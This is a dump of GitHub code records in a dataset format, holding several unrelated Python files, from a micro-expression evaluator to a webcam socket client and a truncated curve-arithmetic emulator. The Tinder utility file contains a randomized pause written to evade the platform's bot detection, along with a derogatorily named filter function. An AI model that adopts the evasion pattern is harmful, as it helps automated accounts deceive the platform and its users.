n_pred_mic\r\n\r\n n_gt_mic = 57\r\n\r\n n_gt_mac = 300\r\n if show_message:\r\n print('-------------------------')\r\n\r\n print(f'共有{tp}个正确的分析,共有{tp_mic}个正确的微表情分析')\r\n print('-------------------------')\r\n print(f'共有表情{n_gt}个')\r\n print(f'共测试出{n_pred}个')\r\n print(f'宏表情有{n_pred_mac}个')\r\n print(f'微表情有{n_pred_mic}个')\r\n\r\n report(n_gt, n_pred, tp, '', show_message=show_message)\r\n report( n_gt_mac, n_pred_mac, tp_mac, '宏表情', show_message=show_message)\r\n report( n_gt_mic, n_pred_mic, tp_mic, '微表情', show_message=show_message)\r\nif __name__ == '__main__':\r\n main_casme2()","repo_name":"qin123xyz/MEGC2023_macro-and-micro-expression-spotting","sub_path":"megc2023code/val_cas^2util_0.4066/val_cas^2.py","file_name":"val_cas^2.py","file_ext":"py","file_size_in_byte":9025,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"69914652247","text":"from datetime import date\nfrom random import random\nfrom time import sleep\n\n\ndef calculate_age(birthday_string):\n \"\"\"\n Converts from '1997-03-25T22:49:41.151Z' to an integer (age)\n \"\"\"\n birthyear = int(birthday_string[:4])\n birthmonth = int(birthday_string[5:7])\n birthday = int(birthday_string[8:10])\n today = date.today()\n return today.year - birthyear - ((today.month, today.day) < (birthmonth, birthday))\n\n\ndef pause():\n \"\"\"\n In order to appear as a real Tinder user using the app...\n When making many API calls, it is important to pause a...\n realistic amount of time between actions to not make Tinder...\n suspicious!\n \"\"\"\n nap_length = 3 * random()\n print('Napping for %f seconds...' % nap_length)\n sleep(nap_length)\n\n\nNUMS = [\"ⳊꚨI\", \"Oཏꗚ\", \"ອꚨI\", \"ອꚨl\", \"ອךI\", \"9ገI\", \"ꏿཏꕃ\", \"WhatsApp\", \"Whatsap\"]\n\n\ndef check_sluts(rec):\n for num in NUMS:\n if rec['user'].get('jobs') and num in rec['user'].get('jobs')[0]['title']['name']:\n return True\n if num in rec['user']['name'] or num in rec['user']['bio']:\n return True\n if num in rec['user']['name'] or num in rec['user']['bio']:\n return True\n if num in rec.get('teaser')['string'] or num in rec.get('teaser')['string']:\n return True\n return False\n","repo_name":"DmitriiDenisov/tinder_swipe","sub_path":"utils/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5380818432","text":"from django import forms\n\nfrom app.models import AppPost\n\nclass CreateAppPostForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = AppPost\n\t\tfields = ['title', 'body', 'image']\n\nclass UpdateAppPostForm(forms.ModelForm):\n\t\n\tclass Meta:\n\t\tmodel = AppPost\n\t\tfields = ['title', 'body', 'image']\n\n\tdef save(self,commit=True):\n\t\tapp_post = self.instance\n\t\tapp_post.title = self.cleaned_data['title']\n\t\tapp_post.body = self.cleaned_data['body']\n\n\t\tif self.cleaned_data['image']:\n\t\t\tapp_post.image = self.cleaned_data['image']\n\n\t\tif commit:\n\t\t\tapp_post.save()\n\t\treturn app_post\t","repo_name":"GAYATHRI-3200/Simple-Blog","sub_path":"website/app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"5552096199","text":"# Uses python3\nimport random\nfrom math import sqrt\n\n\ndef get_distance(point1, point2):\n if point1 is None or point2 is None:\n return None\n else:\n return sqrt(\n (point1[0] - point2[0]) ** 2\n +\n (point1[1] - point2[1]) ** 2\n )\n\n\ndef get_xdistance(point1, point2):\n if point1 is None or point2 is None:\n return None\n else:\n return abs(point1[0] - point2[0])\n\n\ndef get_ydistance(point1, point2):\n if point1 is None or point2 is None:\n return None\n else:\n return abs(point1[1] - point2[1])\n\n\ndef get_min_distance_naive(points, return_points=None):\n closest_points = None\n min_distance = None\n n = len(points)\n\n for i in range(n):\n for j in range(i + 1, n):\n point2 = points[j]\n point1 = points[i]\n distance = get_distance(point1, point2)\n if min_distance is None or distance < min_distance:\n min_distance = distance\n closest_points = (point1, point2)\n if return_points:\n return min_distance, closest_points\n else:\n return min_distance # , closest_points\n\n\ndef get_inter_min(points, min_init, verbose=None):\n n_points = len(points)\n dist_min = min_init\n if verbose:\n print(\n \"[get_inter_min][start] dist_min={} points={}\".format(\n dist_min,\n points\n )\n )\n for i in range(n_points):\n for j in range(i + 1, n_points):\n dist_y = get_ydistance(points[i], points[j])\n dist = get_distance(points[i], points[j])\n if verbose:\n print(\n \"[get_inter_min][loop] points={} dist={} dist_min\".format(\n (points[i], points[j]), dist, dist_min\n )\n )\n\n if dist_y > dist_min:\n break\n if dist_min is None or dist < dist_min:\n dist_min = dist\n\n if verbose:\n print(\n \"[get_inter_min][finish] min={}\".format(\n dist_min\n )\n )\n return dist_min\n\n\ndef get_reccursion(points_x, points_y, verbose=None):\n n_points = len(points_x)\n if verbose:\n print(\"get_reccursion: start: points_x={} points_y={}\".format(points_x,points_y))\n if n_points <= 3:\n if verbose:\n print(\"get_reccursion: n={}<=4\".format(n_points))\n d_min = get_min_distance_naive(points_x)\n if verbose:\n print(\"get_reccursion: d_min={}\".format(d_min))\n return d_min\n else:\n idx_mid = n_points // 2\n point_mid = points_x[idx_mid]\n left_x = points_x[:idx_mid+1]\n right_x = points_x[idx_mid+1:]\n left_y = []\n right_y = []\n for p in points_y:\n if p[0] <= point_mid[0]:\n left_y.append(p)\n else:\n right_y.append(p)\n if verbose:\n print(\n \"get_reccursion: left_x={} right_x={}\".format(\n left_x, right_x\n )\n )\n print(\n \"get_reccursion: left_y={} right_y={}\".format(\n left_y, right_y\n )\n )\n left_min = get_reccursion(left_x, left_y,verbose)\n right_min = get_reccursion(right_x, right_y,verbose)\n if left_min is not None and right_min is not None:\n d_min = min(left_min,right_min)\n elif left_min is not None:\n d_min = left_min\n elif right_min is not None:\n d_min = right_min\n else:\n d_min = None\n points_inter = [p for p in points_y if get_xdistance(p, point_mid) <= d_min]\n inter_min = get_inter_min(points_inter, d_min, verbose=verbose)\n if verbose:\n print(\"get_reccursion: d_min={} inter_min={}\".format(d_min,inter_min))\n if inter_min is None:\n return d_min\n else:\n return min(d_min, inter_min)\n\n\ndef get_min_distance(points,verbose=None):\n points_x = sorted(points, key=lambda x: x[0])\n points_y = sorted(points, key=lambda x: x[1])\n return get_reccursion(points_x, points_y,verbose)\n\n\ndef stress_test(n_trials=1000):\n \"\"\"\n :param n_trials:\n :return:\n \"\"\"\n for _ in range(n_trials):\n length = random.randint(5, 20)\n points = [\n (random.randint(0, 10), random.randint(0, 10))\n for _ in range(length)\n ]\n expected = get_min_distance_naive(points)\n actual = get_min_distance(points,False)\n msg = \"{}=={} {}\".format(expected, actual, points)\n assert expected == actual, msg\n\n\ndef test1():\n \"\"\"\n assert expected == actual, msg\n AssertionError: 1.0==1.4142135623730951 [(6, 9), (7, 4), (9, 9), (1, 5), (10, 4), (9, 0), (8, 8), (7, 2), (9, 6), (4, 8), (4, 9)]\n \"\"\"\n points = [(6, 9), (7, 4), (9, 9), (1, 5), (10, 4), (9, 0), (8, 8), (7, 2), (9, 6), (4, 8), (4, 9)]\n\n print(get_min_distance(points, verbose=1), get_min_distance_naive(points))\n\ndef test2():\n \"\"\"\n assert expected == actual, msg\n AssertionError: 1.4142135623730951==2.23606797749979 [(1, 5), (9, 6), (9, 10), (3, 1), (8, 7), (6, 6)]\n :return:\n \"\"\"\n points = [(1, 5), (9, 6), (9, 10), (3, 1), (8, 7), (6, 6)]\n print(get_min_distance(points, verbose=1), get_min_distance_naive(points))\n\ndef test3():\n \"\"\"\n assert expected == actual, msg\nAssertionError: 1.4142135623730951==2.23606797749979 [(1, 5), (9, 6), (9, 10), (3, 1), (8, 7), (6, 6)]\n :return:\n \"\"\"\n points = [(1, 5), (9, 6), (9, 10), (3, 1), (8, 7), (6, 6)]\n print(get_min_distance(points, verbose=1), get_min_distance_naive(points,return_points=1))\n\n\ndef run_interactive():\n n = int(input())\n points = []\n for _ in range(n):\n point = [int(x) for x in input().split()]\n points.append(point)\n print(get_min_distance(points))\n\n\nif __name__ == '__main__':\n # stress_test()\n # test3()\n run_interactive()\n","repo_name":"roman-4erkasov/coursera-data-structures-algorithms","sub_path":"prj01_algorithmic_toolbox/week04wrk06_closest_points_reccursive.py","file_name":"week04wrk06_closest_points_reccursive.py","file_ext":"py","file_size_in_byte":6030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"624718199","text":"from sklearn.model_selection import train_test_split\n\nimport pandas as pd\n\nimport typer\n\n\ndef main(raw_data_inpath: str, train_data_outpath: str, test_data_outpath: str) -> None:\n raw_df = pd.read_parquet(raw_data_inpath)\n print(f\"Load raw data from {raw_data_inpath}\")\n\n train_df, test_df = train_test_split(\n raw_df, test_size=0.3, stratify=raw_df[\"target\"], random_state=123\n ) # Stratifying by 'target' column helps maintain class distribution in both training and testing sets.\n\n train_df.to_parquet(train_data_outpath)\n print(f\"Save train data to {train_data_outpath}\")\n\n test_df.to_parquet(test_data_outpath)\n print(f\"Save test data to {test_data_outpath}\")\n\n\nif __name__ == \"__main__\":\n typer.run(main)\n","repo_name":"nstrande/selfregulated_threshold_ml_classifier","sub_path":"src/steps/get_train_test_data.py","file_name":"get_train_test_data.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4910353656","text":"from .COPExObject import *\r\nfrom .MemStream import *\r\nfrom .CoordLL84 import *\r\nfrom .KeyValueManager import *\r\n\r\n\r\nclass MultiSymbolObject(COPExObject):\r\n CLSID = \"{C1FD308D-CE83-4294-855C-2613F97CC7B4}\"\r\n\r\n def __init__(self):\r\n COPExObject.__init__(self)\r\n\r\n def read_object(self, byte_data):\r\n ms = MemStream(byte_data)\r\n # read version\r\n version = ms.read_dword()\r\n if version == 0x0200:\r\n # strings are UTF8 coded\r\n\r\n # cgm data can be ignored (read, but do not use)\r\n ms.read_bytes()\r\n\r\n lat, lng, hgt = ms.read_coordinate()\r\n self.coords = []\r\n self.coords.append(CoordLL84(lat, lng, hgt))\r\n\r\n self.symbol_string = ms.read_string().decode('latin-1')\r\n self.display_name = ms.read_string().decode('latin-1')\r\n elif version == 0x0100:\r\n # strings are ASCII coded\r\n\r\n # cgm data can be ignored (read, but do not use)\r\n ms.read_bytes()\r\n\r\n lat, lng, hgt = ms.read_coordinate()\r\n self.coords = []\r\n self.coords.append(CoordLL84(lat, lng, hgt))\r\n\r\n self.symbol_string = ms.read_string().decode('latin-1')\r\n self.display_name = ms.read_string().decode('latin-1')\r\n\r\n def __str__(self):\r\n str_ret = \"\"\r\n\r\n kvm = KeyValueManager(';')\r\n kvm.set_key_value_string(self.get_symbol_string())\r\n\r\n keys = [\"LANGUAGE\", \"GZ\", \"ZZ0\", \"ZZ1\", \"ZZ2\", \"ZZ3\"]\r\n for key in keys:\r\n str_ret += key + \": \" + kvm.get_value(key) + \"\\n\"\r\n\r\n return str_ret\r\n","repo_name":"kadas-albireo/kadas-ovl-plugin","sub_path":"kadas_ovl/copexreader/COPEx/MultiSymbolObject.py","file_name":"MultiSymbolObject.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19294117051","text":"# -*- coding:cp949 -*-\n\nimport cv2\nimport socket\nimport struct\nimport pickle\nimport threading\nimport time\n\n# 물마시라는 경고 출력\ndef alarm(client_socket):\n flag = 0\n while True:\n water = client_socket.recv(100).decode() # nx board에게서 물병을 감지했는지 받아옴\n if int(water) == 1: # 물병감지가 안됐다면\n print(\"물을 마시세요\") # 물을 마시라고 경고\n flag = 1\n elif int(water) == 0: # 물병감지가 됐다면\n if flag == 1:\n print(\"알림을 해제합니다\") # 경고 중지\n flag = 0\n \n \nip = '114.70.23.41' # ip 주소\nport = 5050 # port 번호\n\n# 소켓 객체를 생성 및 연결\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient_socket.connect((ip, port))\nprint('연결 성공')\n\n# 카메라 선택\ncamera = cv2.VideoCapture(0)\n\n# 크기 지정\ncamera.set(cv2.CAP_PROP_FRAME_WIDTH, 640); # 가로\ncamera.set(cv2.CAP_PROP_FRAME_HEIGHT, 480); # 세로\n\n# 인코드 파라미터\n# jpg의 경우 cv2.IMWRITE_JPEG_QUALITY를 이용하여 이미지의 품질을 설정\nencode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]\n\n# 경고문 출력을 위한 thread\nthread = threading.Thread(target = alarm, args = (client_socket, ))\nthread.start()\n\nwhile True:\n ret, frame = camera.read() # 카메라 프레임 읽기\n frame = cv2.flip(frame, 1)\n cv2.imshow('check', frame)\n result, frame = cv2.imencode('.jpg', frame, encode_param) # 프레임 인코딩\n # 직렬화(serialization) : 효율적으로 저장하거나 스트림으로 전송할 때 객체의 데이터를 줄로 세워 저장하는 것\n # binary file : 컴퓨터 저장과 처리 목적을 위해 이진 형식으로 인코딩된 데이터를 포함\n data = pickle.dumps(frame, 0) # 프레임을 직렬화화하여 binary file로 변환\n size = len(data)\n # print(\"Frame Size : \", size) # 프레임 크기 출력\n\n \n # 데이터(프레임) 전송\n client_socket.sendall(struct.pack(\">L\", size) + data)\n # print(struct.pack(\">L\", size) + data)\n\n if cv2.waitKey(1) == ord('q') : # q를 입력하면 종료\n cv2.destroyAllWindows()\n break\n \n \n# 메모리를 해제\ncamera.release()","repo_name":"ech97/blinkCapture","sub_path":"src/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72218845529","text":"import re, sys, os, math, random\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\n##########################################################\n### Montgomery related computation\ndef egcd(b, n):\n x0, x1, y0, y1 = 1, 0, 0, 1\n while n != 0:\n q, b, n = b // n, n, b % n\n x0, x1 = x1, x0 - q * x1\n y0, y1 = y1, y0 - q * y1\n return b, x0, y0\ndef modinv(a, m): \n g, x, y = egcd(a, m)\n if g != 1:\n raise Exception(\"Error: modular inverse does not exist\")\n else:\n return x % m\ndef compute_monty_coef(prime, pbitlen):\n \"\"\"\n Compute montgomery coeff r, r^2 and mpinv. pbitlen is the size\n of p in bits.\n \"\"\"\n r = (1 << int(pbitlen)) % prime\n r_square = (1 << (2 * int(pbitlen))) % prime\n pinv = (-modinv(p, r)) % r\n return r, r_square, pinv\n\n### Emulation related stuff\nclass IPECCExecutionContext(object):\n def __init__(self, registers, flags, ip, lrip):\n global OPERANDS_BITS_SIZE\n global BIGNUM_BITS_SIZE\n MEMORY_SIZE = 2**OPERANDS_BITS_SIZE\n self.r = [0] * MEMORY_SIZE\n for (addr, val) in registers:\n if addr > MEMORY_SIZE:\n print_error(\"Error: \", \"@%d exceeds memory capacity of %d\" % (addr, MEMORY_SIZE), \"(only registers in memory are allowed!)\")\n sys.exit(-1)\n self.r[addr] = val\n self.flags = {\n \"%mu0\" : 0, \n \"%kb0\" : 0, \n \"%par\" : 0, \n \"%kapP\" : 0, \n \"%kap\" : 0,\n # Arithmetic carry flag\n \"%Carith\" : 0,\n # Shift carry flag\n \"%Cshift\" : 0,\n # Zero flag\n \"%Z\" : 0,\n # Strictly negative flag \n \"%SN\" : 0, \n }\n for (f, val) in flags:\n self.flags[f] = val\n # Instruction pointer\n if ip is not None:\n self.ip = ip\n else:\n self.ip = 0\n # Link register\n if lrip is not None:\n self.lrip = lrip\n else:\n self.lrip = 0\n # p constant cached\n self.p = self.r[0]\n # Executed \"line\" in textual form\n self.executed_line = None\n # Masking related stuff\n self.s = [0x0, 0x0, 0x0, 0x0]\n #### Patch related stuff\n #### FIXME: this must be implemented!\n #self.do_blinding = 0\n #self.masklsb = 0\n #self.setup = 0\n #self.laststep = 0\n #self.zu = self.zc = 0\n #self.r0z = self.r1z = 0\n #self.patches = {\n # \"p\" : 0,\n # \"as\" : 0,\n # \"opa\" : { \"x0\" : 0, \"x1\" : 0, \"y0\" : 0, \"y1\" : 0, \"x0next\" : 0, \"x1next\" : 0, \"y0next\" : 0, \"y1next\" : 0, \"x0det\" : 0, \"y0det\" : 0 },\n # \"opb\" : { \"x0\" : 0, \"x1\" : 0, \"y0\" : 0, \"y1\" : 0, \"x0next\" : 0, \"x1next\" : 0, \"y0next\" : 0, \"y1next\" : 0, \"x0det\" : 0, \"y0det\" : 0 },\n # \"opc\" : { \"x1\" : 0, \"y1\" : 0, \"x0next\" : 0, \"x1next\" : 0, \"y0next\" : 0, \"y1next\" : 0, \"blvoid\" : 0, \"copiesopa\" : 0, \"bl0\" : 0, \"bl1\" : 0 },\n #}\n def __str__(self):\n a = \"\\t============== IPECC Execution context ==============\\n\"\n addr = 0\n a += \"\\tMemory: [ \"\n for v in self.r:\n a += \"(%d, %s), \" % (addr, hex(v))\n addr += 1\n a += \" ]\\n\\tFlags: %s\\n\\tIP=0x%x\\n\\tLRIP=0x%x\\n\" % (self.flags, self.ip, self.lrip)\n if self.executed_line is not None:\n a += \"\\t==> %s\\n\" % self.executed_line\n return a\n\ndef apply_patch(execution_context, opa, opb, opc, options):\n for o in options:\n patch_num = None\n # Get the patch\n aa = re.search(r\"p([0-9]+)\", o)\n if aa is not None:\n patch_num = int(aa.group(1))\n if patch_num is None:\n # Nothing to do, return\n return (execution_context, opa, opb, opc)\n else:\n print_error(\"Error: \", \"%s: \" % execution_context.executed_line, \" patch %d is asked, patches are NOT implemented yet!\" % patch_num)\n sys.exit(-1)\n # Nothing to do, return\n return (execution_context, opa, opb, opc)\n\ndef update_arith_flags(C, execution_context, Z=False, SN=False, ODD=False):\n if Z is True:\n # Check if we are 0\n execution_context.flags['%Z'] = int(C == 0)\n if SN is True:\n # If we have produced a negative number set the SN\n execution_context.flags['%SN'] = (C >> (BIGNUM_BITS_SIZE - 1)) & 1\n if ODD is True:\n # Check if we are even or odd\n execution_context.flags['%par'] = (C % 2)\n return execution_context\n\ndef nop_emulate(ins, execution_context):\n # Nop does nothing except increment the ip\n execution_context.ip += 1\n return execution_context\n\ndef nnadd_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Perform our addition modulo\n A = execution_context.r[opa]\n B = execution_context.r[opb]\n C = (A + B)\n # Do we have to add the carry?\n for o in options:\n if (o == 'X') and (execution_context.flags['%Carith'] == 1):\n C += 1\n # If we have produced a carry set the flag\n if C >= (2**BIGNUM_BITS_SIZE):\n execution_context.flags['%Carith'] = 1\n C = (C % (2**BIGNUM_BITS_SIZE))\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True, SN=True)\n # Result\n execution_context.r[opc] = C\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnsub_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Perform our addition modulo\n A = execution_context.r[opa]\n B = execution_context.r[opb]\n C = (A - B)\n # Do we have to add the carry?\n for o in options:\n if (o == 'X') and (execution_context.flags['%Carith'] == 1):\n C += 1\n # Normalize our number in two's complement\n C = (C % (2**BIGNUM_BITS_SIZE))\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True, SN=True)\n # Result\n execution_context.r[opc] = C\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnsrl_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n A = execution_context.r[opa]\n # Do we have to add the carry?\n carry = 0\n for o in options:\n if (o == 'X') and (execution_context.flags['%Cshift'] == 1):\n carry = 1\n if (A & 1):\n execution_context.flags['%Cshift'] = 1\n C = (A >> 1) | (carry << (BIGNUM_BITS_SIZE - 1))\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True)\n execution_context.r[opc] = C\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnsll_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n A = execution_context.r[opa]\n # Do we have to add the carry?\n carry = 0\n for o in options:\n if (o == 'X') and (execution_context.flags['%Cshift'] == 1):\n carry = 1\n if (A >> (BIGNUM_BITS_SIZE - 1)) == 1:\n execution_context.flags['%Cshift'] = 1\n C = (A << 1) % (2**BIGNUM_BITS_SIZE)\n C |= carry\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True)\n execution_context.r[opc] = C\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnrnd_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n execution_context.r[opc] = random.randrange(0, 2**BIGNUM_BITS_SIZE)\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True)\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef testpars_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n opc_name = abstract_operands[2][1]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Test the parity of opa and update the flag\n A = execution_context.r[opa]\n execution_context.flags[opc_name] = (A % 2)\n # \n return execution_context\n\ndef nnxor_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Perform our addition modulo\n A = execution_context.r[opa]\n B = execution_context.r[opb]\n C = (A ^ B)\n # Result\n execution_context.r[opc] = C\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef fpredc_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Perform our addition modulo\n A = execution_context.r[opa]\n B = execution_context.r[opb]\n pbitlen = getbitlen(execution_context.p)\n # NOTE: we add 4 bits for the Monty trick using R > 4p\n # for the 0 < u, v, w < 2p invariant\n MontyR = 2**(BIGNUM_BITS_SIZE + 4)\n C = (A * B * modinv(MontyR, execution_context.p)) % execution_context.p\n # Result\n execution_context.r[opc] = C\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef testpar_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opc = abstract_operands[2][2]\n opc_name = abstract_operands[2][1]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Test the parity of opa and update the flag\n A = execution_context.r[opa]\n execution_context.flags[opc_name] = (A % 2)\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnrndm_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operand\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # NOTE: (BIGNUM_BITS_SIZE - 1) truncation for NNRNDM to\n # ensure the random result is < p\n execution_context.r[opc] = random.randrange(0, 2**(BIGNUM_BITS_SIZE - 1))\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True)\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nndiv2_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n A = execution_context.r[opa]\n # Save the sign\n sign = (A >> (BIGNUM_BITS_SIZE - 1)) & 0x1\n C = (A >> 1) | (sign << (BIGNUM_BITS_SIZE - 1))\n execution_context.r[opc] = C\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True)\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnrnds_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Generate our mask\n s_num = int(opb)\n execution_context.s[s_num] = random.randrange(0, 2**BIGNUM_BITS_SIZE)\n # Put the mask in the opc operand\n execution_context.r[opc] = execution_context.s[s_num]\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True)\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnrndf_emumate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Generate our mask\n s_num = int(opb)\n execution_context.s[s_num] = random.randrange(0, 2**BIGNUM_BITS_SIZE)\n # Put the mask in the opc operand\n execution_context.r[opc] = execution_context.s[s_num]\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnsrls_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n A = execution_context.r[opa] \n s_num = int(opb)\n # Unmask our value\n A = (A ^ execution_context.s[s_num])\n # Do we have to add the carry?\n carry = 0\n for o in options:\n if (o == 'X') and (execution_context.flags['%Cshift'] == 1):\n carry = 1\n if (A & 1):\n execution_context.flags['%Cshift'] = (1 ^ (execution_context.s[s_num] & 0x1))\n C = (A >> 1) | (carry << (BIGNUM_BITS_SIZE - 1))\n # Shift our mask\n execution_context.s[s_num] = execution_context.s[s_num] >> 1\n # Mask our result value\n C = (C ^ execution_context.s[s_num])\n execution_context.r[opc] = C\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True)\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef j_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Jump to our target\n imm = abstract_operands[0][2]\n execution_context.ip = imm\n return execution_context\n\ndef jz_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Jump to our target only if '%Z' is set\n if execution_context.flags['%Z'] == 1:\n imm = abstract_operands[0][2]\n execution_context.ip = imm\n else:\n execution_context.ip += 1\n return execution_context\n\ndef jsn_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Jump to our target only if '%SN' is set\n if execution_context.flags['%SN'] == 1:\n imm = abstract_operands[0][2]\n execution_context.ip = imm\n else:\n execution_context.ip += 1\n return execution_context\n\ndef jodd_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Jump to our target only if '%par' is set\n if execution_context.flags['%par'] == 1:\n imm = abstract_operands[0][2]\n execution_context.ip = imm\n else:\n execution_context.ip += 1\n return execution_context\n\ndef jkap_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Jump to our target only if '%kap' is set\n if execution_context.flags['%kap'] == 1:\n imm = abstract_operands[0][2]\n execution_context.ip = 